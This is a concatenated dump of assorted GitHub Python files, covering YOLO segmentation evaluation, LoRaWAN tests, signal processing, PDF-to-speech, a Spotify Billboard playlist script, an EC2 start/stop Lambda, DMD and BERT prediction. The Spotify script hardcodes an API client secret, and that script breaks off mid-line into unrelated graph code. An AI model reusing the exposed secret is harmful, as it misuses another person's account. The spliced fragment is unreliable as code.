= max(min(np.around((y1 - 
y_offset) / y_scale * image_h).astype(np.int32), image_h), 0)\r\n y2 = max(min(np.around((y2 - y_offset) / y_scale * image_h).astype(np.int32), image_h), 0)\r\n \r\n return x1, y1, x2, y2\r\n\r\n# def sigmoid(self, x):\r\n# return 1. / (1. + np.exp(-x))\r\n\r\n def sigmoid(self, x):\r\n a = -1. * x\r\n a = np.clip(a, -50., 50.)\r\n a = 1. / (1. + np.exp(a))\r\n return a\r\n\r\ndef image_read(image_rgb, image_size):\r\n \r\n window = np.array([0., 0., 1., 1.], dtype=np.float32)\r\n imgh, imgw, _ = image_rgb.shape\r\n if (float(image_size)/imgw) < (float(image_size)/imgh): \r\n imgh = (imgh * image_size)//imgw\r\n imgw = image_size\r\n else:\r\n imgw = (imgw * image_size)//imgh\r\n imgh = image_size\r\n\r\n image = image_rgb.astype(np.float32)\r\n image = cv2.resize(image, (imgw, imgh),interpolation = cv2.INTER_LINEAR)\r\n\r\n # prepare the window for clip_boxes in testing mode\r\n top = (image_size - imgh)//2\r\n left = (image_size - imgw)//2\r\n window[0] = top / image_size\r\n window[1] = left / image_size\r\n window[2] = (imgh + top) / image_size\r\n window[3] = (imgw + left) / image_size\r\n\r\n # embed the image into standard letter box\r\n new_image = np.ones((image_size, image_size, 3)) * 127.\r\n new_image[(image_size - imgh)//2:(image_size + imgh)//2, \r\n (image_size - imgw)//2:(image_size + imgw)//2, :]= image \r\n new_image = new_image / 255.0\r\n return new_image, window\r\n\r\n\r\n''' Computing mask-level mAP and mIoU '''\r\ndef evaluate(weights_file, test_path, net, eval_map):\r\n\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n saver = tf.train.Saver()\r\n saver.restore(sess, weights_file)\r\n \r\n txtname = os.path.join(test_path, 'cache', 'test.txt')\r\n with open(txtname, 'r') as f:\r\n image_index = [x.strip() for x in f.readlines()]\r\n\r\n val_mask = eval_map.groundtruth[0]\r\n val_mergemask = eval_map.groundtruth[1]\r\n val_index = eval_map.groundtruth[3]\r\n \r\n t_prediction = 0\r\n t_crop_assemble = 0 \r\n \r\n det_masks = {}\r\n detfile = {}\r\n cracklist = []\r\n spalllist = []\r\n rebarlist = [] \r\n for i, index in enumerate(image_index):\r\n print(index)\r\n assert index==val_index[i]\r\n \r\n imname = os.path.join(test_path, 'images', index + '.jpg')\r\n image_rgb = cv2.cvtColor(cv2.imread(imname), cv2.COLOR_BGR2RGB) \r\n image_h, image_w, _ = image_rgb.shape \r\n input_image, input_window = image_read(image_rgb, cfg.TEST_SIZE)\r\n image_array = np.expand_dims(input_image, 0)\r\n window_array = np.expand_dims(input_window, 0)\r\n \r\n feed_val = {net.is_training: False, net.det_thresh: [np.float32(cfg.OBJ_THRESHOLD)], \r\n net.clip_window: window_array, net.images: image_array}\r\n\r\n t = time.time()\r\n det_box, det_mask = sess.run(net.evaluation, feed_dict=feed_val)\r\n t_prediction += (time.time() - t)\r\n \r\n if np.sum(det_mask[0]) == 0.0:\r\n merged_detectmask = np.zeros((image_h, image_w), dtype=np.uint8)\r\n det_masks[index] = merged_detectmask\r\n continue\r\n \r\n proposals = det_box[0][:, :4]\r\n classids = (det_box[0][:, 4]).astype(int)\r\n class_confs = det_box[0][:, 5]\r\n mask_out = det_mask[0]\r\n \r\n merged_detectmask = np.zeros((image_h, image_w), dtype=np.uint8)\r\n # correct the boxes and masks into original image size\r\n for k in range(len(classids)):\r\n classid = classids[k]\r\n score = class_confs[k]\r\n pred_mask = mask_out[k]\r\n \r\n # correct boxes\r\n y1_norm, x1_norm, y2_norm, x2_norm = proposals[k,:]\r\n x1, y1, x2, y2 = eval_map.correct_yolo_boxes(x1_norm, y1_norm, x2_norm, y2_norm, image_h, 
image_w, cfg.TEST_SIZE, cfg.TEST_SIZE)\r\n\r\n if (y2-y1)*(x2-x1) <= 0:\r\n continue\r\n\r\n # correct masks\r\n t = time.time()\r\n size = pred_mask.shape[0]\r\n y1_norm = np.around(y1_norm * size).astype(np.int32)\r\n x1_norm = np.around(x1_norm * size).astype(np.int32)\r\n y2_norm = np.around(y2_norm * size).astype(np.int32)\r\n x2_norm = np.around(x2_norm * size).astype(np.int32) \r\n crop_mask = pred_mask[y1_norm:y2_norm, x1_norm:x2_norm]\r\n mask = cv2.resize(crop_mask, (x2 - x1, y2 - y1), interpolation = cv2.INTER_LINEAR)\r\n mask = np.where(mask > 0.5, 1, 0).astype(np.bool)\r\n full_mask = np.zeros([image_h, image_w], dtype=np.bool)\r\n full_mask[y1:y2, x1:x2] = mask\r\n t_crop_assemble += (time.time() - t)\r\n \r\n if classid==0:\r\n cracklist.append({'imageid': index, 'score': score, 'mask': full_mask})\r\n merged_detectmask[full_mask==True] = 1\r\n elif classid==1:\r\n spalllist.append({'imageid': index, 'score': score, 'mask': full_mask})\r\n merged_detectmask[full_mask==True] = 2\r\n elif classid==2:\r\n rebarlist.append({'imageid': index, 'score': score, 'mask': full_mask})\r\n merged_detectmask[full_mask==True] = 3\r\n\r\n det_masks[index] = merged_detectmask \r\n \r\n detfile['0']=cracklist\r\n detfile['1']=spalllist\r\n detfile['2']=rebarlist\r\n\r\n # compute mask-level AP and mAP\r\n thresh = 0.5\r\n thresh_out = []\r\n res = []\r\n pres = []\r\n aps = []\r\n for i, clsid in enumerate(eval_map.classid):\r\n if not detfile[str(clsid)]:\r\n recall = 0.\r\n precision = 0.\r\n ap = 0.\r\n res += [recall]\r\n pres += [precision] \r\n aps += [ap]\r\n continue\r\n recall, precision, ap = voc_eval(detfile[str(clsid)], val_mask, txtname, \r\n clsid, ovthresh= thresh, use_07_metric = False)\r\n res += [recall]\r\n pres += [precision]\r\n aps += [ap]\r\n \r\n mean_rec = np.mean(res)\r\n mean_prec = np.mean(pres)\r\n mean_ap = np.mean(aps) \r\n thresh_out.append({'thresh': thresh, 'AP': aps, 'mAP': [mean_rec, mean_prec, mean_ap]})\r\n \r\n t_prediction = t_prediction + t_crop_assemble\r\n print(\"Prediction time: {}. 
Average {}/image\".format(t_prediction, t_prediction / len(image_index)))\r\n\r\n # compute semantic segmentation accuracy mIoU\r\n p_bg = [0, 0, 0, 0] \r\n p_crack = [0, 0, 0, 0]\r\n p_spall = [0, 0, 0, 0]\r\n p_rebar = [0, 0, 0, 0] \r\n \r\n num_all_true_pixels = 0\r\n for index in val_index:\r\n true_mask = val_mergemask[index]\r\n pred_mask = det_masks[index]\r\n assert true_mask.shape == pred_mask.shape\r\n \r\n num_all_true_pixels = num_all_true_pixels + int(true_mask.shape[0] * true_mask.shape[1])\r\n \r\n # prediction = background(bg)\r\n p_bg[0] = p_bg[0] + np.sum((true_mask==0) * (pred_mask==0))\r\n p_crack[0] = p_crack[0] + np.sum((true_mask==1) * (pred_mask==0))\r\n p_spall[0] = p_spall[0] + np.sum((true_mask==2) * (pred_mask==0))\r\n p_rebar[0] = p_rebar[0] + np.sum((true_mask==3) * (pred_mask==0))\r\n # prediction = crack\r\n p_bg[1] = p_bg[1] + np.sum((true_mask==0) * (pred_mask==1))\r\n p_crack[1] = p_crack[1] + np.sum((true_mask==1) * (pred_mask==1))\r\n p_spall[1] = p_spall[1] + np.sum((true_mask==2) * (pred_mask==1))\r\n p_rebar[1] = p_rebar[1] + np.sum((true_mask==3) * (pred_mask==1))\r\n # prediction = spall\r\n p_bg[2] = p_bg[2] + np.sum((true_mask==0) * (pred_mask==2))\r\n p_crack[2] = p_crack[2] + np.sum((true_mask==1) * (pred_mask==2))\r\n p_spall[2] = p_spall[2] + np.sum((true_mask==2) * (pred_mask==2))\r\n p_rebar[2] = p_rebar[2] + np.sum((true_mask==3) * (pred_mask==2))\r\n # prediction = rebar\r\n p_bg[3] = p_bg[3] + np.sum((true_mask==0) * (pred_mask==3))\r\n p_crack[3] = p_crack[3] + np.sum((true_mask==1) * (pred_mask==3))\r\n p_spall[3] = p_spall[3] + np.sum((true_mask==2) * (pred_mask==3))\r\n p_rebar[3] = p_rebar[3] + np.sum((true_mask==3) * (pred_mask==3))\r\n \r\n bg_iou = p_bg[0] / (np.sum(p_bg) + p_bg[0] + p_crack[0] + p_spall[0] + p_rebar[0] - p_bg[0])\r\n crack_iou = p_crack[1] / (np.sum(p_crack) + p_bg[1] + p_crack[1] + p_spall[1] + p_rebar[1] - p_crack[1])\r\n spall_iou = p_spall[2] / (np.sum(p_spall) + p_bg[2] + p_crack[2] + p_spall[2] + p_rebar[2] - p_spall[2])\r\n rebar_iou = p_rebar[3] / (np.sum(p_rebar) + p_bg[3] + p_crack[3] + p_spall[3] + p_rebar[3] - p_rebar[3])\r\n miou = np.mean([bg_iou, crack_iou, spall_iou, rebar_iou])\r\n \r\n mask_acc = [bg_iou, crack_iou, spall_iou, rebar_iou, miou]\r\n \r\n return thresh_out, mask_acc\r\n\r\n \r\nif __name__ == '__main__': \r\n \r\n os.environ['CUDA_VISIBLE_DEVICES'] = cfg.GPU\r\n \r\n cfg.BATCH_SIZE = 1\r\n \r\n yolo = YOLONet(False)\r\n \r\n test_path = os.path.join(cfg.DATASET, \"test\")\r\n test_weight = os.path.join(cfg.OUTPUT_DIR, \"TRAINED MODEL\")\r\n \r\n eval_map = MAP(test_path, evaluation=True) \r\n\r\n thresh_out, mask_acc = evaluate(test_weight, test_path, yolo, eval_map)\r\n \r\n print('AP of each class: ' + ' crack ' + str(format(thresh_out[0]['AP'][0], '.3f'))\r\n + ' spall ' + str(format(thresh_out[0]['AP'][1], '.3f'))\r\n + ' rebar ' + str(format(thresh_out[0]['AP'][2], '.3f')))\r\n print('mAP: ' + ' recall ' + str(format(thresh_out[0]['mAP'][0], '.3f'))\r\n + ' precision ' + str(format(thresh_out[0]['mAP'][1], '.3f'))\r\n + ' mAP ' + str(format(thresh_out[0]['mAP'][2], '.3f')))\r\n","repo_name":"ZHANGKEON/DIS-YOLO","sub_path":"calculate_test_map.py","file_name":"calculate_test_map.py","file_ext":"py","file_size_in_byte":15740,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"76"} +{"seq_id":"19225214000","text":"import unittest\nfrom algorithms.lists import LinkedListFactory\nfrom algorithms.lists import 
SteppedSingleLinkedListIterator\nfrom ddt import ddt, data, unpack\n\n\n@ddt\nclass SteppedSingleLinkedListIteratorTest(unittest.TestCase):\n\n @data(([1], 2), ([1, 2], 2), ([1, 2, 3, 4], 2))\n @unpack\n def test_stepped_iterator(self, original_list, step):\n linked_list = LinkedListFactory.create(original_list)\n\n iterator = SteppedSingleLinkedListIterator(linked_list, step)\n\n self.verify_iterator(iterator, original_list, step)\n\n def verify_iterator(self, iterator, original_list, step):\n for i in range(0, len(original_list), step):\n self.assertTrue(iterator.has_next())\n self.assertEqual(original_list[i], iterator.next().val)\n\n self.assertFalse(iterator.has_next())\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"emystein/python-exercises","sub_path":"tests/test_single_linked_list_stepped_forward_iterator.py","file_name":"test_single_linked_list_stepped_forward_iterator.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2770591672","text":"import json\nimport os\n\nfilepath = 'UserData'\n\n\ndef user_exists(user):\n if os.path.exists(f'{filepath}/{user.id}.json'):\n load_user(user.id)\n return\n else:\n save_user(user.id, {'name': str(user),\n 'id': user.id,\n 'timers': [],\n 'friends': []})\n return\n\ndef load_user(id):\n with open(f'{filepath}/{id}.json', 'r') as f:\n data = json.load(f)\n\n return data\n\ndef save_user(id,data):\n with open(f'{filepath}/{id}.json', 'w+') as f:\n json.dump(data, f, indent=4)\n\n\ndef load_users():\n end = {}\n for user in os.listdir(filepath):\n with open(f'{filepath}/{user}', 'r+') as f:\n end[user] = json.load(f)\n\n return end\n\n\ndef add_attribute(name, value):\n for user in os.listdir(filepath):\n with open(f'{filepath}/{user}', 'r+') as f:\n current = json.load(f)\n\n current[name] = value\n\n with open(f'{filepath}/{user}', 'w+') as f:\n json.dump(current, f, indent=4)\n\n\nif __name__ == '__main__':\n add_attribute('friends', [])\n\n","repo_name":"chluebi/timerbot","sub_path":"files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30864795577","text":"import argparse\nimport asyncio\nimport sys\n\nfrom devtest import DeviceTest, LoRaWANTest\nfrom vtimeloop import VirtualTimeLoop\n\nclass ExJoinTest(LoRaWANTest):\n @DeviceTest.test()\n async def join(self) -> bool:\n await self.lw_join()\n await self.lw_uplink()\n return True\n\n @DeviceTest.test()\n async def uplink(self) -> bool:\n await self.lw_join()\n t1 = None\n for _ in range(5):\n m = await self.lw_uplink()\n self.assert_eq(m['FRMPayload'], b'hello')\n t0 = t1\n t1 = asyncio.get_event_loop().time()\n if t0 is not None:\n self.assert_range((t1 - t0), 5, 10)\n return True\n\n @DeviceTest.test()\n async def dnlink(self) -> bool:\n await self.lw_join()\n m = await self.lw_uplink()\n self.lw_dnlink(m, port=15, payload=b'hi there!')\n await asyncio.sleep(5)\n return True\n\n\n\nif __name__ == '__main__':\n p = argparse.ArgumentParser()\n LoRaWANTest.stdargs(p)\n args = p.parse_args()\n\n if args.virtual_time:\n asyncio.set_event_loop(VirtualTimeLoop()) # type: ignore\n\n test = ExJoinTest(args)\n\n if not asyncio.get_event_loop().run_until_complete(test.run()):\n 
sys.exit(1)\n","repo_name":"lorabasics/basicmac","sub_path":"projects/ex-join/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"76"}{"seq_id":"42209717252","text":"import numpy, scipy.io.wavfile,matplotlib.pyplot as plt\nfrom mysignal import play, tone\n\ndef mag2dB(x):\n    return 20 * numpy.log10(x / max(x))\n\ndef plotfft(x, sampling_rate=1,logscale=False, n=None):\n    f=numpy.fft.rfft(x,n)\n    mag=numpy.abs(f)\n    #mag[mag<0.1]=0\n\n    fig1 = plt.figure()\n    if logscale:\n        mag=mag2dB(mag)\n    plt.plot(numpy.arange(mag.size,dtype=numpy.float32)/mag.size*sampling_rate/2, mag, color=\"g\")\n    #deltafreq=rate/mag.size\n    plt.show()\n\ndef find_tones(x, sampling_rate=1, tresh=0.8, logscale=False, n=None):\n    f=numpy.fft.rfft(x,n)\n    #f=f[:f.size/2]\n    mag=numpy.abs(f)\n    if logscale:\n        mag=mag2dB(mag)\n    return numpy.where(mag>tresh*numpy.max(mag))[0]*sampling_rate/(mag.size*2)\n\ndef signalogram(x,frame_size=512, overlap=0.5):\n    advance=int(frame_size*overlap)\n    size = int(numpy.ceil(x.size / advance))\n    ret=numpy.zeros(shape=(frame_size, size))\n    for i in range(size):\n        frame = x[int(advance * i):int(advance * i + frame_size)]\n        frame=numpy.hstack((frame,numpy.zeros(frame_size-frame.size)))\n        ret[:,i]= frame\n    return ret\n\ndef plotSignalogram(signal,frame_size=512):\n    sgnmat = signalogram(signal, frame_size)\n    ft=numpy.abs(numpy.fft.rfft(sgnmat, axis=0))#*numpy.hamming(frame_size)\n    print(sgnmat.shape,ft.shape)\n    fig1 = plt.figure()\n    plt.imshow(ft, cmap=\"hot\", origin=\"lower\")\n    plt.show()\n\nif __name__==\"__main__\":\n    rate, signal = scipy.io.wavfile.read(\"zvizg.wav\")\n    plotSignalogram(signal)\n    \"\"\"def f(x):\n        return numpy.convolve(x,(0.2,0.2,0.2,0.2,0.2))\n    ins=f(tone(250, 1000, 1, 3, 0))\n    fftlength=512\n    plotfft(numpy.hstack(((0.2,0.2,0.2,0.2,0.2), numpy.zeros(fftlength-5))),1000)\n\"\"\"\n    \"\"\"\n    signal = tone(24, 50, 3, 0.45, 0) + tone(6.01, 50, 3, 0.9, 0)\n    #rate,signal=scipy.io.wavfile.read(\"aaa.wav\")\n    print(find_tones(signal,50,0.5))\n    plotfft(signal,50)\"\"\"","repo_name":"t4c1/DSP","sub_path":"freqencyAnalysis.py","file_name":"freqencyAnalysis.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}{"seq_id":"36850532469","text":"import os\nimport sys\n\nimport requests\nfrom PyPDF2 import PdfReader\n\nAPI_BASE_URL = \"http://api.voicerss.org/\"\nAPI_KEY = os.getenv(\"API_KEY\")\nMAX_CHARACTERS = 1000\n\npdf_file_path = sys.argv[1]\npdf_language = sys.argv[2] if len(sys.argv) > 2 else \"pl-pl\"\n\nreader = PdfReader(pdf_file_path)\ntext = \"\"\n\nfor page in reader.pages:\n    text += page.extract_text() + \"\\n\"\n\nwith open(\"pdftext\", \"w\") as file:\n    file.write(text)\n\n\ndef crop_text(text):\n    if len(text) > MAX_CHARACTERS:\n        return (text[i:i + MAX_CHARACTERS]\n                for i in range(0, len(text), MAX_CHARACTERS))\n    return [text]  # short texts are returned as a single chunk, so the caller can always iterate\n\n\ndef get_speech_from_text(text, language=\"pl-pl\", audio_codec='MP3'):\n    for chunk in crop_text(text):\n        params = {\n            \"key\": API_KEY,\n            \"src\": chunk,\n            \"c\": audio_codec,\n            \"hl\": language\n        }\n        req = requests.get(API_BASE_URL, params=params, stream=True)\n        with open(\"new_mp3.mp3\", 'ab') as file:\n            for chunk in req.iter_content(chunk_size=128):\n                file.write(chunk)\n\n\nif __name__ == \"__main__\":\n    get_speech_from_text(text, 
pdf_language)\n","repo_name":"ErykKnesz/Text-to-speech","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17210724184","text":"#!/usr/bin/env python\n\"\"\"\nLOOK AT remove_duplicates_array_2.py\n\nGiven a sorted array, remove the duplicates in place such that each element appear only once and return the new length.\n\nDo not allocate extra space for another array, you must do this in place with constant memory.\n\nFor example,\nGiven input array A = [1,1,2],\n\nYour function should return length = 2, and A is now [1,2].\n\"\"\"\n\ndef removeDuplicates(A):\n\n if not A:\n return 0\n\n if len(A) < 2:\n return len(A)\n\n p = 0 # position of last unique element\n\n for i in range(1, len(A)):\n if A[i] != A[i - 1]:\n p += 1\n A[p] = A[i]\n\n return p + 1 # since we have 0 indexing\n","repo_name":"ashutosh-narkar/LeetCode","sub_path":"remove_duplicates_array_1.py","file_name":"remove_duplicates_array_1.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37111572833","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy.integrate import odeint\nfrom sklearn.preprocessing import PolynomialFeatures\n\ndef duffing_oscillator(y, t):\n y1, y2 = y\n dydt1 = y2\n dydt2 = y1 - y1**3 \n dydt = np.array([dydt1, dydt2])\n return dydt\n\ndef DMD(X,Xprime,r):\n U,Sigma,VT = np.linalg.svd(X,full_matrices=0) # Step 1\n Ur = U[:,:r]\n Sigmar = np.diag(Sigma[:r])\n VTr = VT[:r,:]\n Atilde = np.linalg.solve(Sigmar.T,(Ur.T @ Xprime @ VTr.T).T).T # Step 2\n Lambda, W = np.linalg.eig(Atilde) # Step 3\n Lambda = np.diag(Lambda)\n \n Phi = Xprime @ np.linalg.solve(Sigmar.T,VTr).T @ W # Step 4\n # alpha1 = Sigmar @ VTr[:,0]\n # b = np.linalg.solve(W @ Lambda,alpha1)\n return Phi, Lambda\n\ndef DMDc(X, Xprime, C, p, r):\n Omega = np.concatenate((X, C), axis=0)\n n1 = X.shape[0]\n n2 = C.shape[0]\n\n U_in, Sigma_in, VT_in = np.linalg.svd(Omega,full_matrices=0)\n U_inr = U_in[:,:p]\n Sigma_inr = Sigma_in[:p]\n VT_inr = VT_in[:p,:]\n\n U_inr1 = U_inr[:n1,:]\n U_inr2 = U_inr[n1:, :]\n\n U_out, Sigma_out, VT_out = np.linalg.svd(Xprime, full_matrices=0)\n U_outr = U_out[:,:r]\n Sigma_outr = Sigma_out[:r]\n VT_outr = VT_out[:r,:]\n\n Atilde = np.linalg.multi_dot([U_outr.T.conj(), Xprime, VT_inr.T,\n np.diag(np.reciprocal(Sigma_inr)), U_inr1.T.conj(), U_outr])\n \n Btilde = np.linalg.multi_dot([U_outr.T.conj(), Xprime, VT_inr.T,\n np.diag(np.reciprocal(Sigma_inr)), U_inr2.T.conj()])\n \n Lambda, W = np.linalg.eig(Atilde)\n\n Phi = np.linalg.multi_dot([Xprime, VT_inr.T,\n np.diag(np.reciprocal(Sigma_inr)), U_inr1.T.conj(), U_outr, W])\n\n return Atilde, Btilde, U_outr\n \n\n\n\n\n\ndef collect_data(n_sim, time, n_steps):\n ymin = -1.5\n ymax = 1.5\n X = None\n Xprime = None\n for _ in range(n_sim):\n y = np.random.random(2)*(ymax-ymin) + ymin\n t = np.linspace(0, time, n_steps)\n sol = odeint(duffing_oscillator, y, t)\n if X is None and Xprime is None:\n X = sol.T[:,:-1]\n Xprime = sol.T[:,1:]\n else:\n X = np.concatenate((X, sol.T[:,:-1]), axis=1)\n Xprime = np.concatenate((Xprime, sol.T[:,1:]), axis=1)\n \n return X, Xprime\n\nif __name__ == \"__main__\":\n\n n_sim = 300\n time = 15\n n_step = 100\n\n X, Xp = collect_data(n_sim, time, n_step)\n\n degree = 5\n poly = PolynomialFeatures(5)\n X_lifted = poly.fit_transform(X.T).T\n Xp_lifted = 
poly.fit_transform(Xp.T).T\n\n r = min(X_lifted.shape)\n Phi, Lambda = DMD(X_lifted, Xp_lifted, r)\n\n ymin = -1.5\n ymax = 1.5\n y = np.random.random(2)*(ymax-ymin) + ymin\n y_lifted = poly.fit_transform(y.reshape((1,-1))).squeeze()\n\n b = np.linalg.solve(Phi, y_lifted)\n\n sol_recon = []\n\n for i in range(n_step):\n x = np.real(Phi@np.linalg.matrix_power(Lambda, i)@b)\n sol_recon.append(x)\n\n sol_recon = np.array(sol_recon)\n\n t = np.linspace(0, time, n_step)\n sol_exact = odeint(duffing_oscillator, y, t)\n\n print(f'Initial condition: {y[0]}, {y[1]}')\n\n # plt.plot(sol_exact[:, 0], sol_exact[:, 1], label='exact')\n # plt.plot(sol_recon[:, 1], sol_recon[:, 2], label='reconstructed')\n\n plt.plot(t, sol_exact[:, 0], label='exact')\n plt.plot(t, sol_recon[:, 1], label='reconstructed')\n\n plt.legend()\n plt.show()\n","repo_name":"maroun96/burger-control-dmd","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26825365286","text":"import os\nimport csv\nimport torch\nimport argparse\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom transformers import InputExample, InputFeatures\nfrom transformers import BertConfig, BertForSequenceClassification, BertTokenizer, BertModel\nfrom transformers import glue_convert_examples_to_features as convert_examples_to_features\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\nbert_model = (BertConfig, BertForSequenceClassification, BertTokenizer)\n\n\ndef create_examples(lines, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n examples = []\n del lines[0]\n for (i, line) in enumerate(lines):\n guid = \"%s-%s\" % (set_type, i)\n # label = int(line[1])\n # CNM!!@!!\n text_a = line[2].replace(\"YZYHUST\", ',')\n examples.append(\n InputExample(guid=guid, text_a=text_a, text_b=None, label=None))\n return examples\n\n\ndef Load_data(args, tokenizer):\n csv.field_size_limit(500 * 1024 * 1024)\n with open(os.path.join(args.data_dir, 'val.csv'), 'r') as f:\n examples = create_examples(list(csv.reader(f)), 'predict')\n label_list = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n features = convert_examples_to_features(\n examples,\n tokenizer,\n label_list=label_list,\n max_length=args.max_seq_length,\n output_mode=\"classification\",\n )\n all_input_ids = torch.tensor([f.input_ids for f in features],\n dtype=torch.long)\n all_attention_mask = torch.tensor([f.attention_mask for f in features],\n dtype=torch.long)\n all_token_type_ids = torch.tensor([f.token_type_ids for f in features],\n dtype=torch.long)\n dataset = TensorDataset(all_input_ids, all_attention_mask,\n all_token_type_ids)\n return DataLoader(dataset, batch_size=16)\n\n\n#all in main\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--data_dir\",\n default=\"bert/url/predict\", #need to be changed for debug\n type=str,\n required=False,\n help=\"Locate the dataset\")\n parser.add_argument(\"--model_dir\",\n default='bert/model',\n type=str,\n required=False,\n help=\"Locate the pre-trained model\")\n parser.add_argument(\"--max_seq_length\",\n default=256,\n type=int,\n required=False)\n args = parser.parse_args()\n\n config_class, model_class, tokenizer_class = bert_model\n\n # Load Bert\n config = config_class.from_pretrained(args.model_dir, num_labels=13)\n tokenizer = 
tokenizer_class.from_pretrained(args.model_dir)\n    model = model_class.from_pretrained(args.model_dir,\n                                        from_tf=False,\n                                        config=config)\n    model.to(device)\n    #Load Data\n    #pipeline: file->example->features\n    pred_dataloader = Load_data(args, tokenizer)\n    #Predict\n    preds = None\n    for batch in tqdm(pred_dataloader, desc=\"Evaluating\"):\n        model.eval()\n        batch = tuple(t.to(device) for t in batch)\n\n        with torch.no_grad():\n            inputs = {\n                'input_ids': batch[0],\n                'attention_mask': batch[1],\n            }\n            inputs['token_type_ids'] = batch[2]\n            outputs = model(**inputs)\n\n        logits = outputs[0]\n\n        if preds is None:\n            preds = logits.detach().cpu().numpy()\n        else:\n            preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)\n\n    m = torch.nn.Softmax(dim=1)\n    prob = np.array(m(torch.Tensor(preds)))\n    pred = np.argmax(preds, axis=1)\n    pred = pd.DataFrame(pred)\n    prob = pd.DataFrame(prob)\n    prob.columns = [\n        '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12'\n    ]\n    pred.columns = ['pred']\n    prediction = pd.concat([pred, prob], axis=1)\n    # save results\n    prediction.to_csv(index=None, path_or_buf='./predict.csv')\n\n\nif __name__ == \"__main__\":\n    print(\"current device:\", device)\n    main()\n","repo_name":"Imcaicai/FCS","sub_path":"bert/buffer/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"}{"seq_id":"42121410001","text":"import json\nimport datetime\nimport boto3\n\ninstance_ID = 'L25004-EC2-Scheduling-TEST'\n\ndef lambda_handler(event, context):\n    client = boto3.client('ec2') # create the EC2 client\n    response = client.describe_instances() # list all EC2 instances in the account\n    \n    ec2_list = [] # list holding the target EC2 instances; start_instances and stop_instances require a list argument\n    is_Running = False\n    \n    for ec2 in response['Reservations']:\n        for instance in ec2['Instances']:\n            for tags in instance['Tags']:\n                if tags['Key'] == 'Name':\n                    if instance_ID in tags['Value']: # if this is the instance we are looking for\n                        print(\"\\n=== FIND TARGET EC2 ===\")\n                        print(tags['Value'] + ' : ' + instance['InstanceId'] + '\\n')\n                        ec2_list.append(instance['InstanceId'])\n                    \n                        if instance['State']['Code'] == 16: # running(16) # set is_Running to True if the instance is currently running\n                            is_Running = True\n                        else : # otherwise False\n                            is_Running = False\n\n\n    if is_Running == False : # the target EC2 is not running, so start it\n        start = client.start_instances(InstanceIds = ec2_list)\n        print(\"=== SERVER START ====\")\n        return start\n    else : # the target EC2 is running, so stop it.\n        stop = client.stop_instances(InstanceIds = ec2_list)\n        print(\"=== SERVER STOP ====\")\n        return stop\n\n\n'''\n### description of the client call ###\nclient.describe_instances()\nreturn >> https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.describe_instances\n\n### arguments of start_instances / stop_instances ###\nstart_instances(InstanceIds(list), AdditionalInfo(str), DryRun(boolean))\n>> client.start_instances(\n    InstanceIds=[\n        'string',\n    ],\n    AdditionalInfo='string',\n    DryRun=True|False\n)\n\n### return values of instance['State']['Code']; each state has its own number ###\n# code value: 0 (pending), 16 (running), 32 (shutting-down), 48 (terminated), 64 (stopping), and 80 (stopped)\n\ncron(0 9/8 ? * MON-FRI *) weekdays 09:00-17:00\n'''","repo_name":"Flare-k/CICD_Pipeline","sub_path":"EC2_Scheduling/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}{"seq_id":"43101570681","text":"from email import header\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nfrom bs4 import BeautifulSoup\nimport requests\n\nurl=\"https://www.billboard.com/charts/hot-100/\"\n\ndate=input(\"what date would you like to travel to, in YYYY-MM-DD \")\n#**********************************************Code Dealing with Getting authenticated with Spotify API*************************************\nCLIENT_ID=\"29b4aa34873d43e7a5fb0133a098c832\"\nCLIENT_SECRET=\"63c8b9a9dbe747f8814d4143b83c56be\"\n\nscope = \"playlist-modify-private\"\n\nsp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id=CLIENT_ID,client_secret=CLIENT_SECRET,redirect_uri=\"http://example.com\",scope=scope))\n\nUSER_ID=sp.current_user()['display_name']\n\n#********************************************Code Dealing with Getting Billboard Data In desirable form************************************\nresponse=requests.get(url=url+date)\nwebpage=response.text\n\nsoup=BeautifulSoup(webpage,\"html.parser\")\nraw_songs=soup.find_all(name=\"h3\",id=\"title-of-a-story\",class_=\"c-title\")\n\nsongs=[song.getText() for song in raw_songs]\ndel songs[0:6]\nstart=1\nend=start+3\nwhile (end \" + adjacent_vertex)\n\n\ndef build_graph(directed):\n    g = Graph(directed)\n    vertices = []\n    for val in ['a', 'b', 'c', 'd', 'e', 'f', 'g']:\n        vertex = Vertex(val)\n        vertices.append(vertex)\n        